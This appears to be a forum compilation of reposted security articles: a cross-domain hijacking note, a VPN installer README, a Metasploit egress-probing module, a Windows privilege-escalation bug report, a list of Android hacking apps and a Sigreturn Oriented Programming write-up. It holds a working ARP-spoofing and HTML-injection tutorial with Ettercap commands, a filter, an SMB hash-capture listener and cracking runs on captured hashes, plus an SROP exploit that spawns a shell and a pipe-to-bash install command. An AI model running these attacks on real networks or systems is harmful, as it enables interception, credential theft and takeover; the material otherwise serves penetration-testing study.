- Explanation Of Cross Domain And Client Access Policy Files For Silverlight: http://www.devtoolshed.com/explanation-cross-domain-and-client-access-policy-files-silverlight
- Cross-domain policy file specification | Adobe Developer Connection
- Setting a crossdomain.xml file for HTTP streaming | Adobe Developer Connection

Sursa: https://github.com/nccgroup/CrossSiteContentHijacking
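The Content-Disposition advice above boils down to one extra response header on every user-uploaded file. A minimal sketch of what a download handler could emit (the function name and header list shape are mine, not part of the project):

```python
def download_headers(filename: str) -> list:
    """Response headers that make a browser save the file instead of
    rendering it, keeping Flash/PDF content out of the site's origin."""
    return [
        ("Content-Type", "application/octet-stream"),
        ("Content-Disposition", 'attachment; filename="%s"' % filename),
    ]
```

Serving an uploaded "photo.jpg" with these headers means that even if the file is really an SWF or PDF object, the browser will download it rather than execute it in the site's context.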
-
[h=1]Instavpn[/h]
[h=3]Requirements[/h]
Ubuntu 14.04
512 MB RAM
[h=3]Install[/h]
[h=5]curl -sS https://sockeye.cc/instavpn.sh | sudo bash[/h]
[h=3]Web UI[/h]
Browse at http://IP-ADDRESS:8080
[h=3]CLI[/h]
instavpn list - Show all credentials
instavpn stat - Show bandwidth statistics
instavpn psk get - Get pre-shared key
instavpn psk set <psk> - Set pre-shared key
instavpn user get <username> - Get password
instavpn user set <username> <password> - Set password or create user if not exists
instavpn user delete <username> - Delete user
instavpn user list - List all users
instavpn web mode [on|off] - Turn on/off web UI
instavpn web set <username> <password> - Set username/password for web UI
Sursa: https://github.com/sockeye44/instavpn
-
[h=3]Metasploit: Getting outbound filtering rules by tracerouting[/h]

Deciding between a bind or reverse shell depends greatly on the network environment in which we find ourselves. For example, in the case of choosing a bind shell we have to know in advance whether our machine is reachable on any port from outside. Some time ago I wrote about how we can get this information (inbound filtering rules) using the packetrecorder script from Meterpreter. Another alternative is to use an IPv6 bind shell (bind_ipv6_tcp). The idea of this payload is to create an IPv6 tunnel over IPv4 with a Teredo relay, through which the bind shell becomes reachable from an IPv6 address. You can read more about this in the post: Revenge of the bind shell.

On the other hand, in the case of using a reverse shell, we must know the outbound filtering rules of the organization to see if our shell can get outside. In most situations we usually choose port 80 or 443, since these ports are rarely blocked for an ordinary user. However, there are cases in which we face a much more restrictive scenario. For example, if we get access to a server from an internal network and want to install a reverse shell from that server to the outside, maybe outgoing connections on ports 80 and 443 are denied.

The reverse_tcp_allports payload was created to work in such environments. This payload will attempt to connect to our handler (installed on some external machine) using multiple ports. The payload supports the LPORT argument, by which we specify the initial connection port. If it cannot connect to the handler, it will increase the port number one by one until a connection is made. The problem with this approach is that it is very slow due to the timeouts of blocked connections. In addition, much noise is generated as a result of each of these connections.
Because of the need to know which outgoing ports are allowed, I have written a post-exploitation Meterpreter module that allows you to infer TCP filtering rules for the desired ports. At first I thought of using the same logic as the "Egress Firewall Testing" MetaModule built into Metasploit Pro v4.7. This MetaModule allows you to get outbound rules by sending SYN packets to one of the servers hosted by Rapid7 (egadz.metasploit.com). The server is configured to respond on all ports (all 65535 ports are open), so if your host receives a SYN/ACK you can deduce that a certain port is not filtered. This service is similar to http://portquiz.net, which I have sometimes used, usually on Linux machines, to learn the filtering policies of the organization in which I am doing a pentest.

However, I did not like the idea of depending on a particular external service. Moreover, while it would be easy to prepare a machine with a couple of iptables rules, I still found it a bit cumbersome. After shuffling some options, I ended up creating the outbound_ports.rb module for Windows, which does not depend on any service or external configuration.

The module is a kind of traceroute using TCP packets with incremental TTL values. The idea is to launch a TCP connection to a public IP (this IP does not need to be under your control) with a low TTL value. As a result of the TTL, some intermediate device will return an ICMP "TTL exceeded" packet. If the victim host is able to read that ICMP packet, we can infer that the port used is not filtered. By default the TTL will start with a value of 1, although this can be changed with the MIN_TTL parameter. With HOPS we indicate the number of hops to probe. Personally I tend to use a low value, since all I need is to get an ICMP response from a public IP. The module also has the TIMEOUT parameter to set the waiting time of the ICMP socket.
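The outbound_ports.rb module itself is Ruby, but the TCP half of the trick is easy to illustrate. The sketch below (my own, in Python) only shows the SYN-with-low-TTL part; reading the ICMP "TTL exceeded" replies additionally requires a raw socket and elevated privileges, as explained above:

```python
import socket

def syn_with_ttl(host: str, port: int, ttl: int) -> socket.socket:
    """Fire a SYN towards host:port with a deliberately small IP TTL.

    If a router at hop `ttl` answers with ICMP "TTL exceeded", the SYN
    made it out of the network, i.e. the outbound port is not filtered.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)
    s.setblocking(False)          # don't wait for the handshake to finish
    try:
        s.connect((host, port))   # emits the SYN
    except OSError:
        pass                      # EINPROGRESS is expected for non-blocking connect
    return s
```

Repeating this with ttl = 1, 2, 3, ... while listening on a raw ICMP socket reproduces the module's traceroute-like behaviour.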
In the following example I've used the public IP 208.84.244.10 to check whether outbound connections to ports 443 and 8080 are filtered. As shown, we have obtained several ICMP replies from different routers, so now we know that those ports would be good candidates for our reverse shell.

You can play around with the HOPS and MIN_TTL options. For example, if you do not want to create so much noise you can set an initial TTL of 3 and set the number of hops to 1. In that case, and unless the organization has a complex network, you could receive a quick response from an external IP. Another alternative is to set the STOP option to true. Thus, when a public IP responds with an ICMP packet, the script will not continue launching more connections. As you can tell, the module will also be useful for inferring the network topology of our target, working in the same way as a traceroute.

Internally, the module uses two sockets. First, a TCP socket in non-blocking mode; this socket is in charge of launching SYN packets with different TTL values (set with the setsockopt API and the IP_TTL option). On the other hand, a raw ICMP socket is needed to read the ICMP responses. Since the Windows firewall blocks this type of packet by default, the module uses netsh to allow incoming ICMP traffic.

For now the module is under review. The module is already included in Metasploit.

Posted by Borja Merino at 12:26 PM
Sursa: Shell is coming ...: Metasploit: Getting outbound filtering rules by tracerouting
-
You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and, if required, a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage. Note, your mileage may vary with this stew. I’m not Martha Stewart. Also, the stew analogy ends here.

The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap.

The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database.

The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get the rcracki_mt binary. You will also need to download the HALFLMCHALL rainbowtables, so visit that same tutorial.

The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card:

sudo add-apt-repository ppa:xorg-edgers/ppa
sudo apt-get update
sudo apt-get install nvidia-331 nvidia-settings-331

Now we have all our ingredients. Sorry, promised the analogy would end. Let’s Get To It!
What we will accomplish is Address Resolution Protocol (ARP) spoofing of a local network segment, injecting HTML into traffic whenever a user surfs the Internet/Intranet, and forcing clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that forces authentication with a known challenge. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients), a rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used, you still have a hash that you can dictionary attack or brute force, preferably with a cracker that takes advantage of your graphics card, i.e. oclHashCat.

Setting Up Metasploit SMB Server

# service smbd stop
smbd stop/waiting
# /opt/metasploit-framework/msfconsole
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >

ARP Spoofing and Packet Filtering with Ettercap

Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or affect network performance. While this is outside the scope of this article, you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons.

Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap. Open your favorite text editor and paste the code below.
# vim http-img.filter

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body ");
   msg("Filter Ran 4.\n");
}

Once the file is saved, use the etterfilter command to convert the code into the binary format Ettercap understands.

# etterfilter http-img.filter -o http-img.ef
etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team

12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'http-img.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'http-img.ef' done.
-> Script encoded into 15 instructions.

Copy the binary to the Ettercap share folder:

# cp http-img.ef /usr/share/ettercap (may be /usr/local/share/ettercap)

If you know your target, you can start Ettercap from the command line to begin sniffing, ARP spoofing, and filtering the traffic:

# ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0

If you prefer the GUI then follow the screenshots found here. This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit:

msf auxiliary(smb) >
[*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014
NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108
USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:09af7e143207525cfc17e4037a1f0a54
NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000

The last step we need to accomplish is to crack the hash obtained.
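For clarity, here is what those two filter rules do to the HTTP stream, reproduced in Python (illustration only; the listener address 192.168.0.100 is a placeholder for your Metasploit host):

```python
def apply_filter(payload: bytes) -> bytes:
    """Mimic the two etterfilter rules above on a captured HTTP payload."""
    # Rule 1: same-length replacement defeats compression, so the HTML
    # stays editable in transit without changing TCP payload sizes.
    payload = payload.replace(b"Accept-Encoding", b"Accept-Rubbish!")
    # Rule 2: inject a UNC image before </body>; fetching it makes the
    # client authenticate against the Metasploit SMB capture server.
    inject = b'<img src="\\\\192.168.0.100\\pixel.gif"></body'
    return payload.replace(b"</body", inject)
```

Running a page through this function shows exactly the modified response the victim's browser receives.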
The example above has LM hashing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test. One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline brute-force tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty.

Username::WINDOWSDOMAIN:1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788

We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72

# cd ~/tools/rcracki_mt_0.7.0_linux_x86_64
# ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72
Using 1 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti
reading index... 13528977 bytes read, disk access time: 0.00 s
reading table... 461190920 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 1d006cfe2f3a9f72 is GOOSE00
cryptanalysis time: 0.06 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 0.00s
total cryptanalysis time: 0.06s
total pre-calculation time: 2.34s
total chain walk step: 2876401
total false alarm: 31
total chain walk step due to false alarm: 68140

result
-------------------------------------------------------
1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030

Now to brute force the remaining portion of the password using a Ruby script that comes with Metasploit.
# cd /opt/metasploit-framework/tools
# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00
[*] Trying one character...
[*] Trying two characters (eta: 12.858231544494629 seconds)...
[*] Cracked: GOOSE004#

Using the script to brute force up to three characters is about as far as you want to go with halflm_second.rb, as you see in the example below. That is a ten character password, which is not too shabby. As you see below, a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window.

Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788

# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI
[*] Trying one character...
[*] Trying two characters (eta: 10.010079860687256 seconds)...
[*] Trying three characters (eta: 2292.3082880973816 seconds)...
[*] Trying four characters (eta: 524938.5979743004 seconds)...

An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take, but know that it is exponentially longer and not even scripted into halflm_second.rb. So oclHashcat and GPU password cracking to the rescue! To continue the saga visit this tutorial on using Hashcat to brute force the second half of the password.

Great sites to learn about Ettercap Filtering:
- Fun with Ettercap Filters
- "Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples
- ETTERCAP - The Easy Tutorial - Man in the middle attacks

Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security
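Those ETA figures grow by roughly the size of the character set with every extra unknown character, which is why the script stops being practical past three or four characters. A back-of-the-envelope estimate (the 69-character set size and the guess rate are my assumptions, not measurements from the post):

```python
CHARSET = 69  # approximate LM character set: upper-case letters, digits, symbols

def eta_seconds(unknown_chars: int, rate: float = 500.0) -> float:
    """Worst-case seconds to exhaust `unknown_chars` characters at `rate` guesses/s."""
    return CHARSET ** unknown_chars / rate
```

Each additional character multiplies the search time by about 69; the 6.075-day figure for an eleven-character password corresponds to four unknown characters left after the rainbow-table step, and a twelfth character pushes the job firmly into GPU territory.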
-
Reported by fors..@google.com, Oct 13, 2014

Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that can’t be influenced. However there seems to be a bug in the way it handles impersonation: the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account; it isn't something that only happens during the initial provisioning of the local profile.

Some identified issues are:

* When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists, but of course worth remembering that normal users can create directories in the c: drive root. So there is always a possibility of being able to place a junction point at c:\users on some systems.

* The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the user’s hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is that the string starts with %USERPROFILE%, so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole, as the security of the directory is inherited from the parent.

* Creation of the AppData\LocalLow folder in EnsurePreCreateKnownFolders.
This might be exploited to set an arbitrary directory’s integrity level to Low, as it tries to set the label explicitly. But that’s probably only of interest if there’s a directory which a normal user would be able to write to but is blocked by a high/system integrity level, which is unlikely.

* Probably most serious is the handling of the %USERPROFILE%\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the user’s registry hive, then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's shell folders registry key and placing a junction in the hierarchy, you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded. For example you could create a directory hierarchy like:

%USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows

Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal. It seems to even set the root key security when it does so; this might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator, otherwise the privilege check for SeRestorePrivilege will fail.

I've looked at the implementation on Windows 7 and there are a few similar issues, but the Windows 8.1 implementation of the service does a lot more things. At least the most serious UsrClass.dat issue exists in 7.

Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify, perform the following steps:

1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain).
This will change the environment variables TEMP and TMP to %USERPROFILE%\..\..\..\..\Windows\faketemp
2) Log out, then log back in again.
3) Observe that the directory \Windows\faketemp has been created.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: set_temp.bat (207 bytes)

Sursa: https://code.google.com/p/google-security-research/issues/detail?can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&groupby=&sort=&id=123
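The temporary-folder issue works because the service only checks the %USERPROFILE% prefix, after which ordinary path normalization walks back out of the profile. This can be seen with Python's ntpath module (the profile path below is a made-up example, not from the report):

```python
import ntpath

# TEMP only has to *start* with %USERPROFILE%; the "..\" components then
# climb out of the profile before the privileged directory creation runs.
expanded = r"C:\Users\victim" + r"\..\..\..\..\Windows\faketemp"
print(ntpath.normpath(expanded))  # C:\Windows\faketemp
```

Four "..\" hops are enough to reach the drive root from a default profile depth, which is why the PoC lands in \Windows\faketemp.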
-
Here we have, in no particular order, the top Android apps for hacking using an Android smartphone.

Disclaimer: These apps should be used for research purposes only.

1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009.

2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an HTTP post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.

3. Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks.

4. Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon, used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses.

5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

6. SSHDroid:- SSHDroid is an SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc).

7. WiFi Analyser:- Turns your Android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

8. Network Discovery:- Discover hosts and scan their ports in your WiFi network.
A great tool for testing your network security.

9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers.

10. dSploit:- An Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

11. Hackode:- The hacker’s toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits etc.

12. Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the server.

13. APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse Android applications. The goal of this project is to aid analysts and reverse engineers in visualizing compiled Android packages and their corresponding DEX code.

14. DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.

15. Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device, and only the provider of the web service can protect the users. So anybody can test the security of his account by himself and can decide whether to keep on using the web service.

17. AppUse – Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine.
This system is a unique, free platform for mobile application security testing in the Android environment, and it includes unique custom-made tools created by AppSec Labs.

18. Shark for Root:- Traffic sniffer; works on 3G and WiFi (works in FroYo tethered mode too). To open the dump use WireShark or similar software; for previewing the dump on the phone use Shark Reader. Based on tcpdump.

19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds. Fast and accurate, Fing is a professional app for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.

20. Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload.

21. WifiKill:- The second app, developed also by B.Ponury, is an app which can kill connections and kick site-hoggers from the site. This app definitely kicks the net user from the site so he cannot use it anymore. The app also offers a list of the sites viewed by the hogger.

22. DroidSniff:- Similar to DroidSheep but with a newer and nicer interface is DroidSniff – a sniffing app not only for Facebook. This app shows you what the hogger is looking for; then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly.

23. Network Spoofer:- The last app, called NetWork Spoofer, is very similar to dSploit but it’s easier to use. The only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others.

24. Droid SQLI:- Allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques: Time based injection, blind injection, error based injection, normal injection. 25. sqlmapchik:- is a cross-platform sqlmap GUI for the extremely popular sqlmap tool Sursa: The Top Android Apps for Hacking
-
January 3, 2015 — Mehdi Talbi

Playing with signals: An overview on Sigreturn Oriented Programming

Introduction

Back at the last GreHack edition, Herbert Bos presented a novel technique to exploit stack-based overflows more reliably on Linux. We review this new exploitation technique hereafter and provide an exploit along with the vulnerable server. Even though this technique is portable to multiple platforms, we will focus on a 64-bit Linux OS in this blog post. All sample code used in this blog post is available for download through the following archive.

We've got a signal

When the kernel delivers a signal, it creates a frame on the stack where it stores the current execution context (flags, registers, etc.) and then gives control to the signal handler. After handling the signal, the kernel calls sigreturn to resume execution. More precisely, the kernel uses the following structure, pushed previously on the stack, to recover the process context. A closer look at this structure is given by figure 1.

typedef struct ucontext {
    unsigned long int uc_flags;
    struct ucontext *uc_link;
    stack_t uc_stack;
    mcontext_t uc_mcontext;
    __sigset_t uc_sigmask;
    struct _libc_fpstate __fpregs_mem;
} ucontext_t;

Now, let's debug the following program (sig.c) to see what really happens when handling a signal on Linux. This program simply registers a signal handler to manage SIGINT signals.
#include <stdio.h>
#include <signal.h>

void handle_signal(int signum)
{
    printf("handling signal: %d\n", signum);
}

int main()
{
    signal(SIGINT, (void *)handle_signal);
    printf("catch me if you can\n");
    while(1) {}
    return 0;
}

/* struct definition for debugging purpose */
struct sigcontext sigcontext;

First of all, we need to tell gdb to not intercept this signal:

gdb$ handle SIGINT nostop pass
Signal        Stop      Print   Pass to program Description
SIGINT        No        Yes     Yes             Interrupt

Then, we set a breakpoint at the signal handling function, start the program and hit CTRL^C to reach the signal handler code.

gdb$ b handle_signal
Breakpoint 1 at 0x4005a7: file sig.c, line 6.
gdb$ r
Starting program: /home/mtalbi/sig
hit CTRL^C to catch me
^C
Program received signal SIGINT, Interrupt.
Breakpoint 1, handle_signal (signum=0x2) at sig.c:6
6           printf("handling signal: %d", signum);
gdb$ bt
#0  handle_signal (signum=0x2) at sig.c:6
#1  <signal handler called>
#2  main () at sig.c:13

We note here that frame #1 is created in order to resume the process execution at the point where it was interrupted. This is confirmed by checking the instructions pointed to by rip, which correspond to the sigreturn syscall:

gdb$ frame 1
#1  <signal handler called>
gdb$ x/2i $rip
=> 0x7ffff7a844f0:  mov $0xf,%rax
   0x7ffff7a844f7:  syscall

Figure 1 shows the stack at the signal handling function's entry point.

Figure 1: Stack at signal handling function entry point

We can check the values of some saved registers and flags. Note that the sigcontext structure is the same as the uc_mcontext structure. It is located at rbp + 7 * 8 according to figure 1.
It holds the saved register and flag values:

gdb$ frame 0
...
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rip
$5 = 0x4005da
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rsp
$6 = 0x7fffffffe110
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rax
$7 = 0x17
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->cs
$8 = 0x33
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->eflags
$9 = 0x202

Now, we can verify that after handling the signal, the registers recover their values:

gdb$ b 13
Breakpoint 2 at 0x4005da: file sig.c, line 13.
gdb$ c
Continuing.
handling signal: 2

Breakpoint 2, main () at sig.c:13
13          while(1) {}
gdb$ i r
...
rax     0x17                0x17
rsp     0x7fffffffe110      0x7fffffffe110
eflags  0x202               [ IF ]
cs      0x33                0x33
...

Exploitation

If we manage to overflow a saved instruction pointer with sigreturn's address and forge a uc_mcontext structure by adjusting register and flag values, then we can execute any syscall. It may be a little confusing here. In effect, trying to execute a syscall by returning into another syscall (sigreturn) may seem strange at first sight. Well, the main difference here is that the latter does not require any parameters at all. All we need is a gadget that sets rax to 0xf in order to run any system call through the sigreturn syscall. Gadgets are small sequences of instructions ending with a ret instruction. These gadgets are chained together to perform a specific action. This technique is well known as ROP: Return-Oriented Programming [Sha07].

Surprisingly, it is quite easy to find a syscall; ret gadget on some Linux distributions where the vsyscall map is still in use. The vsyscall page is mapped at a fixed location in all user-space processes. For interested readers, here is a good link about vsyscall.
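Before looking at the vsyscall gadgets, it helps to see what the forged frame actually looks like in bytes. The sketch below builds such a frame with struct.pack, assuming the standard x86-64 rt_sigframe register order (the same 31-qword layout that pwntools' SigreturnFrame uses); the addresses are placeholders and the offsets should be double-checked against the target's struct sigcontext:

```python
import struct

# Assumed field order of the ucontext/sigcontext area consumed by
# rt_sigreturn on x86-64 -- verify against your target's headers.
FRAME_FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
    "rip", "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]

def sigreturn_frame(**regs):
    """Pack the byte blob that sigreturn loads into the CPU state."""
    values = {f: 0 for f in FRAME_FIELDS}
    values["csgsfs"] = 0x33          # user-mode code segment selector
    values.update(regs)
    return struct.pack("<%dQ" % len(FRAME_FIELDS),
                       *[values[f] for f in FRAME_FIELDS])

# Example: a frame that would perform execve("/bin/sh", argv, 0);
# 0x601000/0x601100 are hypothetical addresses of "/bin/sh" and argv,
# and rip points at the vsyscall syscall; ret gadget from the post.
frame = sigreturn_frame(rax=0x3b, rdi=0x601000, rsi=0x601100,
                        rip=0xffffffffff600007)
assert len(frame) == 248  # 31 qwords
```

This is only a layout sketch: the real exploit below does the same thing from C by filling a struct ucontext and memcpy'ing it over the stack.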
mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps
...
7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0     [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0     [vsyscall]
...
gdb$ x/3i 0xffffffffff600000
  0xffffffffff600000:   mov rax,0x60
  0xffffffffff600007:   syscall
  0xffffffffff600009:   ret

Bosman and Bos list in [BB14] the locations of sigreturn and syscall gadgets for different operating systems, including FreeBSD and Mac OS X.

Assuming that we have found the required gadgets, we need to arrange our payload as shown in figure 3 in order to successfully exploit a classic stack-based overflow. Note that zeroes should be allowed in the payload (e.g. a non-strcpy vulnerability); otherwise, we need to find a way to zero some parts of the uc_mcontext structure.

The following code (srop.c) is a proof of concept of sigreturn oriented programming that starts a /bin/sh shell:

#include <stdio.h>
#include <string.h>
#include <signal.h>

#define SYSCALL 0xffffffffff600007

struct ucontext ctx;
char *shell[] = {"/bin/sh", NULL};

void gadget();

int main()
{
    unsigned long *ret;

    /* initializing the context structure */
    bzero(&ctx, sizeof(struct ucontext));

    /* setting rip value (points to syscall address) */
    ctx.uc_mcontext.gregs[16] = SYSCALL;

    /* setting 0x3b in rax (execve syscall) */
    ctx.uc_mcontext.gregs[13] = 0x3b;

    /* setting first arg of execve in rdi */
    ctx.uc_mcontext.gregs[8] = (unsigned long)shell[0];

    /* setting second arg of execve in rsi */
    ctx.uc_mcontext.gregs[9] = (unsigned long)shell;

    /* cs = 0x33 */
    ctx.uc_mcontext.gregs[18] = 0x33;

    /* overflowing */
    ret = (unsigned long *)&ret + 2;
    *ret = (unsigned long)gadget + 4; // skip gadget's function prologue
    *(ret + 1) = SYSCALL;
    memcpy(ret + 2, &ctx, sizeof(struct ucontext));
    return 0;
}

void gadget()
{
    asm("mov $0xf,%rax\n");
    asm("retq\n");
}

The program fills a uc_mcontext structure with execve syscall parameters. Additionally, the cs register is set to 0x33:

- The instruction pointer rip points to the syscall; ret gadget.
- The rax register holds the execve syscall number.
- The rdi register holds the first parameter of execve (the "/bin/sh" address).
- The rsi register holds the second parameter of execve (the "/bin/sh" arguments).
